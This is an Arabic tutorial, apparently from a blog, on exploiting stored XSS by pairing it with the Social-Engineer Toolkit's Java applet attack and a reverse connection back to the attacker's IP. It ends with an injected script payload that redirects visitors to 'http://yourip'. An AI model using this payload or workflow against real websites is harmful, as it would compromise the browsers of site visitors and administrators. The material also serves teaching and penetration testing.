تعد ثغرات إستغلال ثغرات XSS Stored من اخطر انواع الثغرات الامنية
, لما تمكن المخترق من القيام بعدة
تحكمات واختراقات تخصص اجهزة متصفحة الموقع المصاب وقد يكون المسؤؤل عن
الموقع احد هذه الضحايا , اليوم سوف نتعرف عن كيفية استغلال هذا النوع من
الثغرات وسوف نقوم بأستعمال اداة
SET لضمان نجاح تطبيق الثغرة
غرض الشرح تعليمي
هذا النوع من الثغرات يمكن ان تجده في تطبيقات الويب من خلال متلا زر التعليق او اضافة موضوع او غيرها
كما يتضح في هذه الصورة
بعد تجربة اذا كانت الثغرة متاحة يدويا
او من خلال اداة اختبار اختراق , نقوم بأستخدام اداة SET لأستغلال هذا
النوع من الثغرات بأحترافيه !
نقوم بتشغيل الاداة :
بعد تشغيل الاداة والولوج الى لوحة الخيارات المتنوعة كل ما علينا فعله هو
ان نقوم بضغط علي 1
كما يتضح في هذه الصورة :
بعد اختيار هذا النوع من الهجوم والذي
يستهدف مكون الجافا الموجود في المستعرض لدى المستخدمين نفوم بوضع الايبي
الخاص بنا لعمل اتصال عكسي وكذلك استخدام تصميم محدد للعرض
كما يتضح في هذه الصورة
الخطوة التي تعد اكثر اهمية هي اختيار البايلود المناسب من هذه اللائحة
لأنهاء الاستغلال نقوم بالتوجه الي مكان اكتشاف الثغرة الامنية وتطبيق البايلود الخاص بذلك
مثلا :
<script>window.location="http://yourip"</script>
اضف تعليق
0 comments: